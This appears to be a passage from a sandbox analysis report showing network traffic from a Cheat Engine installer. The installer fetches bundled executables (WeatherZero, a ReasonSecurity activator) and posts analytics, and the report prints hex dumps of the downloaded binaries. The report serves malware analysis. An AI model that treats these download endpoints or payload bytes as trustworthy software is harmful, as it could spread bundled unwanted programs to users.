                                                                                                                                                                                                                                    2024-12-28 21:21:15 UTC16384INData Raw: e4 1f 10 2e 23 e1 04 35 c8 b9 a9 93 73 d3 20 97 a7 4e de 4c b1 5b 50 27 a7 a5 41 be 4c 9d dc 96 f1 a1 12 ee 36 e3 7d 9d 22 55 fa ff d2 76 ed e1 51 15 59 fe 76 a7 93 34 18 b8 0d 24 c2 7c 32 e2 6b d6 ac 30 3b 08 a2 84 06 81 40 f3 10 22 9d 60 82 ba 86 8c 23 62 9b dd f9 04 e9 86 c4 9d 28 d0 c9 c8 dd f2 2a 38 30 e2 08 0a 2e 3b c3 cc e7 8c d1 0d 12 30 3a 1d 60 49 48 22 24 12 99 e8 c4 85 28 6a 65 13 35 48 4c 02 09 f4 9e 73 ea de ee db 8f 3c 7a bf 4f fe 20 7d 1f e7 57 55 e7 9e aa 3a a7 ea 9c 53 81 5f ce c0 af e0 9a 28 7e 20 11 d9 ef 0e dc 0b 78 44 93 a0 e0 a2 95 6b dc 0c 8c e8 f9 87 43 e8 a0 61 65 30 6e 67 5a d8 52 73 f2 a6 16 ff 25 68 ea 09 8c 56 57 e0 9a 55 73 f3 df fb fc 7b 0b 28 36 05 99 ca 24 26 89 0f c8 76 20 2e 06 42 49 1a be b7 d6 b6 5a a1 ab 60 88 fb 30
                                                                                                                                                                                                                                    Data Ascii: .#5s NL[P'AL6}"UvQYv4$|2k0;@"`#b(*80.;0:`IH"$(je5HLs<zO }WU:S_(~ xDkCae0ngZRs%hVWUs{(6$&v .BIZ`0
                                                                                                                                                                                                                                    2024-12-28 21:21:15 UTC16384INData Raw: f2 72 e5 1e e8 a8 94 08 2f ed d8 63 fb 64 44 7b 35 90 af 15 b9 b3 15 ca d8 1a 85 97 6b 81 45 93 59 29 f2 dc 1d a8 48 c5 26 8b 3b 34 7b c0 82 14 6f 8f 75 51 22 b9 dd b8 c2 0a 08 5e 61 35 f6 cb 52 0d 7e 1b 82 9e ee 6b c8 6e 2c 62 20 46 32 cd 6a 6c 04 78 b2 7d 0b 86 7e d8 24 db ab 89 d4 c1 f6 3c 27 dd 17 90 04 c5 5e 59 c4 1c a1 49 1d d0 4c 48 14 b7 90 cf 49 c9 8e 8c fa 8c b9 35 b8 a1 b0 ed 5e fe 20 7c cc d8 4d 3e 86 e2 44 ac c9 68 85 f5 27 60 f3 bb 6f 5c 9d 50 25 76 af 36 65 56 89 14 85 4c 94 e9 88 5e 29 e9 2e 56 4a 68 31 c9 31 ab 2d d0 29 60 a8 42 01 08 c6 87 00 28 56 72 a6 2b 15 de 6c 25 9b 80 cf 8a 35 79 72 c9 8e fc ae cd 98 e0 d9 02 d5 e1 75 83 14 58 b9 34 04 e0 d9 9c 5a cc 1a 37 b7 82 ec 05 64 f0 6e 25 91 7c ab b1 ce d6 e3 9e 1a ee a8 7d 73 46 0f 8b 43
                                                                                                                                                                                                                                    Data Ascii: r/cdD{5kEY)H&;4{ouQ"^a5R~kn,b F2jlx}~$<'^YILHI5^ |M>Dh'`o\P%v6eVL^).VJh11-)`B(Vr+l%5yruX4Z7dn%|}sFC


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    18192.168.2.54984965.9.108.934436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:18 UTC144OUTGET /f/WeatherZero/files/969/WZSetup.zip HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:18 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                                                                                                    Content-Length: 6227973
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Last-Modified: Thu, 08 Dec 2022 09:14:29 GMT
                                                                                                                                                                                                                                    x-amz-version-id: s20fxiZKNPOZhn5cscxnL4vQWeKpCNmb
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:25:14 GMT
                                                                                                                                                                                                                                    ETag: "7cc0288a2a8bbe014f9e344f3068c8f1"
                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: JlA5TFcWdZ31yA1LUGbUTPm-W6t6zGe63zRSflh8zgRAumw3tDWJgg==
                                                                                                                                                                                                                                    Age: 42965
                                                                                                                                                                                                                                    2024-12-28 21:21:18 UTC16384INData Raw: 50 4b 03 04 14 00 00 00 08 00 76 86 87 55 c9 02 ed f5 8d 07 5f 00 10 8b 5f 00 0b 00 00 00 57 5a 53 65 74 75 70 2e 65 78 65 ec bd 7d 78 54 d5 b9 37 bc e7 2b 19 92 09 7b 02 89 46 f9 0a 12 14 0d 52 34 60 89 43 74 02 d9 21 58 06 26 0c 99 81 0a 08 42 70 18 23 a1 c9 de 88 96 e8 84 9d d1 6c 36 63 39 ad 7a 6c 6b 2d 88 3d b5 2d e7 d4 9e 5a a5 ad 8d 19 b0 49 50 d4 f0 51 88 42 6b d4 54 f7 38 51 a3 a4 61 80 98 fd fc ee b5 67 00 cf 79 ce 7b 9e eb b9 de f7 ba de 3f 4e 70 cd 5e 9f f7 5a eb 5e f7 e7 5a 6b 6f 3d df de c5 59 38 8e b3 22 e8 3a c7 ed e7 8c 3f 37 f7 df ff 75 21 8c 9e f4 87 d1 dc 8b a3 de 9c bc df b4 e8 cd c9 cb 82 1b 1b 0b 37 37 d4 df d3 b0 f6 be c2 75 6b 37 6d aa 17 0b ef ae 2d 6c 90 36 15 6e dc 54 58 b1 c4 57 78 5f fd fa da 19 39 39 59 45 29 18 ff 7a d3 f5
                                                                                                                                                                                                                                    Data Ascii: PKvU__WZSetup.exe}xT7+{FR4`Ct!X&Bp#l6c9zlk-=-ZIPQBkT8Qagy{?Np^Z^Zko=Y8":?7u!77uk7m-l6nTXWx_99YE)z
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC10463INData Raw: 6a f2 fa 47 1c 1c 2a c8 0f d9 c7 36 68 51 4f 32 da e6 b0 d1 77 64 1e 2b 34 1e 4e 1b dd 0a 0b 54 7b a1 21 bd a1 b1 d1 4a 47 68 ac b7 33 13 58 e1 b4 ae 0c 76 1d 65 4c 69 a6 38 7a 72 a5 bd 33 83 0e 51 e3 13 40 d3 06 2b c6 5f 23 1e 7c 84 00 a6 27 72 80 72 3c 34 11 fe a5 5c f5 8d 63 1f 8c aa 49 4d c4 d5 d3 70 9a 7f d9 2a d8 41 c6 53 c0 c3 ac e7 a8 b5 99 7f c9 6b e2 5f 76 9b e5 a4 53 11 fa 1b af 50 5f 2f 7e 17 04 8c 29 d3 f4 30 f4 f8 3e a2 c1 e4 18 c9 11 a2 77 5d 89 8b 97 27 a6 cb ed 5f 22 41 c6 6b ba eb 05 97 75 5d 8a ae 3f 1e d5 94 ea 3a ea 70 ba de 69 78 27 05 99 7f d9 61 0c c2 d3 ae d6 24 8b 7b 2c 47 d4 2e ac 8a d1 a7 9a 8c 7d 6e 93 3f 9e 24 f7 4e 8a b6 64 92 1c 8f ce cd 72 25 f9 47 b7 5d 80 9e 6f ea 77 4a bc 7c ce c4 6f bf 8f 6e 65 6d 7b cc 0e fd a1 47 31
                                                                                                                                                                                                                                    Data Ascii: jG*6hQO2wd+4NT{!JGh3XveLi8zr3Q@+_#|'rr<4\cIMp*ASk_vSP_/~)0>w]'_"Aku]?:pix'a${,G.}n?$Ndr%G]owJ|onem{G1
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: 1b fa 16 6c 25 9d 26 9c e4 9d 15 e5 93 ea 24 6d 86 9d b4 9d 6c b4 eb 16 b0 48 9d 0d d5 8a ce 4b f4 f6 72 f2 e1 11 cd e3 0b b3 8a d5 75 9b 36 48 f6 89 6f 72 96 f8 51 d2 7a 83 e4 f4 a6 4d 4e 32 1b 24 e6 16 16 30 7d 95 52 df 12 3d e8 68 84 47 35 4f 2f 2c 54 55 a9 8b 89 cb 4c c9 c8 b4 ca 8a 49 57 8b c9 0c 4b cb f6 c9 fc 28 8e 65 5a 98 aa 56 74 5a 26 87 3a 39 6d db 98 8e 85 85 86 2a 59 d9 6a f5 d9 a9 86 6a f5 ea d6 1a 29 f5 f9 a9 9a 2a 75 d9 3e 62 0c ad 55 d6 f0 05 6c e4 94 a2 db a6 e7 6b ab aa 3a 6b ab a7 aa aa 5a 3b 6b 6a 3b d5 ab 66 d4 d5 3b 5b ab aa b0 92 86 9d 97 94 b3 2c 91 b6 5d 63 db 78 67 43 ed fc 54 ed 74 6d c3 54 4d 43 e7 54 4d ed 7c 6d cd 54 ad 7a 0d 26 af b1 fe 9b 9b d1 d1 c6 1c 5a a7 08 dd e1 7f c3 53 53 73 f3 a4 c2 14 91 0d d7 29 da c2 df 40 47
                                                                                                                                                                                                                                    Data Ascii: l%&$mlHKru6HorQzMN2$0}R=hG5O/,TULIWK(eZVtZ&:9m*Yjj)*u>bUlk:kZ;kj;f;[,]cxgCTtmTMCTM|mTz&ZSSs)@G
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: db 4f 83 78 4c dd bd e5 c7 8f 3e 1a 6b 29 f5 20 c7 49 d5 b4 e7 c1 b7 c5 9c 7a 91 13 55 11 c5 eb dd f4 9a 5e 41 dd 92 9b d9 dd ad 68 c5 8b 87 56 14 e0 62 00 f8 54 e4 94 f6 dc 43 c5 97 0c 2c aa 9f b6 a1 54 0c c8 42 f4 38 8c 28 4d 90 e2 00 4f 67 c6 94 40 05 88 13 ea e9 cf 48 8f ea fe 3f aa 0e ef b5 ba 53 de cc 6d 1c 49 7a 61 1c c0 fe e5 9d 51 d2 fd 06 80 29 09 8f 1c 8f 7a 69 1c ea 55 84 6c dc 5a a0 8b 4f 92 74 63 c4 c3 9f 23 ea 93 8b 97 7e fd a1 12 14 67 58 67 54 68 fb 68 8e 67 81 7a 32 94 d8 02 e7 a2 25 30 1c c0 19 ec 7d a6 76 64 27 80 12 52 1a a4 8b 39 a3 67 49 fa 83 48 45 40 1a 4d 05 a3 54 e6 07 56 f9 97 25 45 fd 78 88 e2 cb b6 0e 4b 72 cd 6e 87 60 57 fc bb 9d ab 15 a4 cc 4d b6 2f 9e 67 c1 f9 d1 29 d2 50 53 1d 53 6f 27 cb 59 1d 2b b4 f8 9a cb 33 46 09 f3
                                                                                                                                                                                                                                    Data Ascii: OxL>k) IzU^AhVbTC,TB8(MOg@H?SmIzaQ)ziUlZOtc#~gXgThhgz2%0}vd'R9gIHE@MTV%ExKrn`WM/g)PSSo'Y+3F
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC5043INData Raw: 56 56 8c 67 61 0e 38 a7 51 87 bb 5a 4d ec 57 a9 6a f3 d9 53 22 d0 9d 46 c4 e9 b8 1e bc 93 65 ef ea d9 7b 61 29 51 69 a1 6e 6e 1a 96 aa b3 50 3c 45 f4 4b c8 e2 3c 18 9f d0 e6 29 06 9b 3c d0 b0 37 63 c3 d3 ec 53 3f 4c a4 ea 32 ba 9a e2 b9 db f7 08 3e f2 ae 48 0e 99 76 26 3b 9a 16 16 f5 82 9c 9c f4 e1 ea 4f c3 05 03 6a b3 4c c9 1a e5 7f 6d 32 47 3f 4a 19 51 15 1c 7d a1 43 51 f0 e0 31 1e a1 ec 82 51 a1 8b ae 33 04 e9 fc 4d 9e 02 3b 42 7b e5 85 6c bf ea 44 61 db e0 7f fe b0 bd b4 99 5c ef ad 45 60 39 3c c8 8c e7 d2 6f ec 9c da ae 9e d1 3f 4c 3e a9 f1 a3 b4 9d 37 53 6e 2d 4e 39 49 d7 22 ba 0f b5 e8 b8 51 c9 f9 eb c1 92 ca ce ad e1 a0 ee 48 21 8b ad 91 13 ee ba 50 66 95 6a 6f 8b af b7 81 75 8a be 69 e4 fc 81 bf cc b0 3a f0 9d 15 87 7b 71 55 fd 40 95 ac 7e 21 00
                                                                                                                                                                                                                                    Data Ascii: VVga8QZMWjS"Fe{a)QinnP<EK<)<7cS?L2>Hv&;OjLm2G?JQ}CQ1Q3M;B{lDa\E`9<o?L>7Sn-N9I"QH!Pfjoui:{qU@~!
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: 74 66 23 8a d3 04 5e 2a 2f a1 8f 84 42 53 47 20 56 aa d6 85 4b 69 c2 b7 93 d7 43 da 84 de e6 da 8b 49 a9 5f bd 2c 98 7b 14 1b 66 59 10 ac 4d 3e 6f 28 2f 07 4e 4e 69 2c 7c d9 bd 4c e8 dc 13 8d 44 a4 51 e6 ab 01 4a 76 e6 f9 97 73 22 1f 41 e9 97 aa 88 b1 1f 50 5b 02 77 4d 49 77 1a 96 c8 59 b7 e1 be a2 6d a2 84 5a 61 d9 2a df 84 8b a2 a3 7f 22 bd 84 a7 68 df 1a b3 87 ed 4e 5d 49 fa 9e 5c a0 33 21 2a fe 9a e6 ad 90 53 c9 93 c3 10 7e 2b 31 12 33 9c c5 13 b3 5e c4 d1 fc 49 71 9d 07 78 b8 5a cf ea 46 eb 59 bf 0b e7 f7 6e 1b e1 f7 92 85 87 47 35 9b 38 0b 6e 7b 02 16 51 eb fe 8b 51 f4 d7 ae 39 26 4b 50 68 0e be 34 aa 9b 05 ab 0f 34 14 4f 59 65 84 7e 55 14 c3 82 ec 9e ab 4a 9d 9e ee 01 fe 23 ba 58 ce c9 06 bb e8 e0 4d 66 0d 39 db a4 47 d5 fe 28 f9 e5 21 df 69 96 40
                                                                                                                                                                                                                                    Data Ascii: tf#^*/BSG VKiCI_,{fYM>o(/NNi,|LDQJvs"AP[wMIwYmZa*"hN]I\3!*S~+13^IqxZFYnG58n{QQ9&KPh44OYe~UJ#XMf9G(!i@
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: 31 e0 d3 c8 fe 8e 3f 53 7e 9c 5f 55 f0 05 c4 16 9e 88 3f 47 fc 17 b9 85 6e bd a8 57 89 ae 80 83 d4 9d 78 17 07 06 87 cf 1d 7c da 90 78 c7 96 2d 85 01 cf 8e b1 4f 19 69 14 bf 07 f9 9d 39 99 aa ce 77 01 71 bd e7 97 7f d9 e3 ae 21 3f 31 4f 5d 18 19 de 42 8d fc f2 aa af f3 26 28 7d b8 33 ca 30 e3 48 95 20 1e ce 1d 12 d0 5a 73 c3 f4 de f0 0f 7b ae 45 b9 48 00 13 21 bc e9 6b a1 48 b2 dc 5b b0 84 81 a3 dc 35 df 2a 4f 1b ec 84 c8 67 01 27 aa 04 be f8 f9 7e 05 63 ac 5e 58 3e 1e f5 5a 72 81 dd 19 ca 17 e5 59 c7 e9 ac 7b de 1e 7e 63 9e 87 8c 0f 20 d8 23 f7 a3 ef 3a 15 ab 02 16 00 3b 8b a4 79 1e 26 dd 80 93 55 10 20 29 b7 ba 62 e0 ae 8b 5c 37 e6 e4 bc ff 0b 7d 28 13 36 93 b8 b3 0b 43 32 11 19 20 65 7a 55 43 ee da b0 16 2f 76 de d8 5e d2 a2 a4 da 9c 0c 84 1e 09 5e ca
                                                                                                                                                                                                                                    Data Ascii: 1?S~_U?GnWx|x-Oi9wq!?1O]B&(}30H Zs{EH!kH[5*Og'~c^X>ZrY{~c #:;y&U )b\7}(6C2 ezUC/v^^
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC11977INData Raw: eb c5 c6 c7 41 5b 65 30 85 08 d7 07 e1 a8 68 f5 b8 3a 66 4c 60 42 dc 6c 00 07 bc 98 37 6e f8 5e c6 6f 5f ad 16 5e 7a 6a ed 74 6e 54 4b 33 a7 26 5e e1 76 4c c5 d8 c1 5e be d0 e7 c4 bc 01 33 58 0a 9b 86 28 9f ba 66 d5 48 ed 0f f7 3f 9b e1 ef 99 0d 11 35 d3 eb 7e 23 32 e6 e4 74 e3 ab 20 5e 93 32 f5 82 ce 25 09 32 6c 10 f2 be ce 8a 7d ef 94 7a 05 98 bd 62 45 cd bb c9 c6 65 da 90 5f 2b f2 86 57 86 4b 69 95 b0 b2 a7 db a0 ef e8 8f aa c7 bd f9 f6 4a bc e1 8d d2 04 66 95 17 94 81 c3 f8 2a db 7c 8d d2 8b b4 19 36 e4 43 f8 2a a1 23 f8 2a 79 8b 45 f5 d2 8b 45 5f 4b a2 0b 9c fb ce 42 2f 34 69 aa 5e 6d f6 ea 35 9d 9f 86 2b ba 02 bd 9f 6f 62 ba 8e f1 2d 0f ce f2 3a ff 6e c4 1f 4c 54 38 3d cf af 07 ba ef 4c b6 bf dc fd 74 6b 57 dd 3c bf 54 c9 26 5a f4 2c 60 7d 9c 5f 9f
                                                                                                                                                                                                                                    Data Ascii: A[e0h:fL`Bl7n^o_^zjtnTK3&^vL^3X(fH?5~#2t ^2%2l}zbEe_+WKiJf*|6C*#*yEE_KB/4i^m5+ob-:nLT8=LtkW<T&Z,`}_
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: a8 a1 12 a2 15 dc 36 7f d9 04 f8 5b bc 5b 42 ef 49 3f b6 58 78 23 0a 46 fc 6e e0 ed cf c8 2b 55 b6 85 d1 c1 5a 02 70 1a fc 0c 58 83 50 74 a0 ce 75 7e f5 9c f5 ad 1a 51 7a 9b 25 f4 ae 94 18 52 d3 12 91 ff 33 4a 4f b3 a8 65 5b 37 f5 48 e0 b1 38 c3 86 87 e4 ce 5b eb 48 a2 a7 a1 45 50 50 a5 12 f3 23 3f 55 0e 78 c8 29 b8 91 a4 d6 ca 39 58 3d 68 b9 cc 29 78 3e 6e 9f 06 06 37 23 6f 17 d3 79 8e 86 9b fa 5b 29 e1 1f 35 23 3d 93 e9 70 7e 45 cc 2a e4 98 e4 38 50 56 84 de 5c 80 97 38 07 c4 9b ec a3 f0 89 2c 2d 2d 27 ba a9 b1 0e 15 b6 a3 cc 16 55 75 02 4a 58 05 ca 74 d8 f2 7c eb 65 a9 71 a4 9b c7 b6 95 30 13 82 e0 2b 01 e0 86 27 71 61 a6 0b 63 a2 63 6e 21 f9 30 01 3b 49 5a 5c a5 73 d4 86 75 89 dc d1 2a 79 29 6a f1 f6 87 54 b7 7b 09 9e 64 61 cd 86 99 94 ec a4 1a c8 6b
                                                                                                                                                                                                                                    Data Ascii: 6[[BI?Xx#Fn+UZpXPtu~Qz%R3JOe[7H8[HEPP#?Ux)9X=h)x>n7#oy[)5#=p~E*8PV\8,--'UuJXt|eq0+'qaccn!0;IZ\su*y)jT{dak
                                                                                                                                                                                                                                    2024-12-28 21:21:19 UTC16384INData Raw: 9b 4b c2 56 0e ef 3f 32 0e 11 1e 4c 6b da 85 f9 17 9e 3e 3d 36 1e 21 c1 92 00 5e 8b 07 af 0d dd 0f d0 6f 9f e2 93 ac 70 8f e4 b8 92 25 2f 2b 3c 9c 27 00 cf 54 cd 2f 7c b3 d7 ef 70 f4 ef 7c c4 ae 0c ef a4 be 2a b4 27 5f 88 9f 95 4e 82 ed df c7 ce 94 62 94 88 b0 64 0f 31 65 f5 52 b8 bf 75 ef 0f 8b 62 92 cf 1b 3e 75 2c 4b e5 ad c1 97 6d be 19 59 27 50 d7 23 d4 2b 99 2b 21 a1 48 5f 63 ab c9 9e 76 9f 7f ce 74 3a 3c 5b 87 b8 ef b9 0f 6e e8 2e 5e d8 a0 d3 4d ca 66 cd d6 0b 1a b1 ac cd d0 3e 21 35 bf ef 51 3c ed cc 79 e3 e9 84 1b 31 61 05 74 c1 cc 4f 84 47 39 20 ed e5 19 a9 f7 22 bb 00 07 9e be 98 03 eb e7 9a f1 5a 5e 09 bd de 78 92 1e 1d 7c 52 8e 86 22 d3 bc 59 75 26 5e 6a dd 5e 10 4f 1c 0c a6 2b 01 dd bb be 0f eb 64 15 23 8a 54 27 53 09 7d 51 fc 16 31 c9 f6 a3
                                                                                                                                                                                                                                    Data Ascii: KV?2Lk>=6!^op%/+<'T/|p|*'_Nbd1eRub>u,KmY'P#++!H_cvt:<[n.^Mf>!5Q<y1atOG9 "Z^x|R"Yu&^j^O+d#T'S}Q1


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    19192.168.2.54987318.66.161.1234436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:31 UTC124OUTGET /rsStubActivator.exe HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                    Host: shield.reasonsecurity.com
                                                                                                                                                                                                                                    2024-12-28 21:21:32 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                                                    Content-Length: 33432
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:32 GMT
                                                                                                                                                                                                                                    ETag: W/"8298-2NTUORvMsBADBlWTtxnmV2euzwM"
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                    Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                    X-Download-Options: noopen
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    content-disposition: attachment; filename=rsStubActivator.exe
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 53f7f921dde38b550ad3de5c10255716.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH52-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: 7JkH8yKWjMyuAPNP0mGaUKjU9OOgBe7z3PIGXIE1ikz6-0Xtd8FoSg==
                                                                                                                                                                                                                                    2024-12-28 21:21:32 UTC3376INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a9 ef 9a d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 12 00 00 00 16 00 00 00 00 00 00 4e 31 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 88 4f 01 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0N1 @@ O`
                                                                                                                                                                                                                                    2024-12-28 21:21:32 UTC16384INData Raw: 72 00 52 73 53 74 75 62 73 41 63 74 69 76 61 74 6f 72 00 72 73 53 74 75 62 73 41 63 74 69 76 61 74 6f 72 00 2e 63 74 6f 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 50 72 6f 64 75 63 74 50 72 6f 70 65 72 74 69 65 73 00 61 72 67 73 00 52 75 6e 50 61 72 61 6d 73 00 72 75 6e 50 61 72 61 6d 73 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 70 72 6f 70 73 00 50 72 6f 63 65 73 73 00 73 65 74 5f 41 72 67 75 6d 65 6e 74 73 00 41 64 64 50 61 72 61 6d 54 6f 51 75 65 72 79 49 66 4e 6f 74 45 78 69 73 74 73
                                                                                                                                                                                                                                    Data Ascii: rRsStubsActivatorrsStubsActivator.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesProductPropertiesargsRunParamsrunParamsSystem.CollectionspropsProcessset_ArgumentsAddParamToQueryIfNotExists
                                                                                                                                                                                                                                    2024-12-28 21:21:32 UTC13672INData Raw: 9d 3a a3 d5 03 e0 bf f0 a2 3c ca 42 dc 18 48 7f 14 34 cf d2 4c ab ef 9b 3d fe 0e b8 64 2a fa 75 28 24 41 ed 42 bf 05 9c 66 49 52 50 f4 51 f3 36 49 4d 8b 20 d2 2c 57 35 79 2b a8 f3 45 60 bc 23 8d 58 f7 dc 61 de 93 fe 39 c0 f9 b2 30 a5 4c d7 e9 98 4a 58 3e d3 03 88 fe b3 8f d3 5e 4b 76 12 51 93 c9 8c 0c 3b 5b 8a 22 a8 c1 26 08 f9 14 10 12 03 7d 5f 23 bb 64 e3 63 e0 a6 e1 3e f6 c2 74 b2 3f 1e 09 76 ec ab 5d 46 75 e2 60 a3 58 09 01 28 00 0e 84 54 ee ce e9 5d c8 5e 30 12 bd 46 9e b5 d3 76 b9 d2 0e 6b 99 0c d2 33 b4 cd b1 02 03 01 00 01 a3 82 01 5d 30 82 01 59 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 ba 16 d9 6d 4d 85 2f 73 29 76 9a 2f 75 8c 6a 20 8f 9e c8 6f 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ec d7 e3 82
                                                                                                                                                                                                                                    Data Ascii: :<BH4L=d*u($ABfIRPQ6IM ,W5y+E`#Xa90LJX>^KvQ;["&}_#dc>t?v]Fu`X(T]^0Fvk3]0Y0U00UmM/s)v/uj o0U#0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    20192.168.2.54988765.9.108.934436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:36 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 412
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:36 UTC412OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 41 64 76 69 73 6f 72 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 65 62 41 64 76 69 73 6f 72 5f 56 33 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c
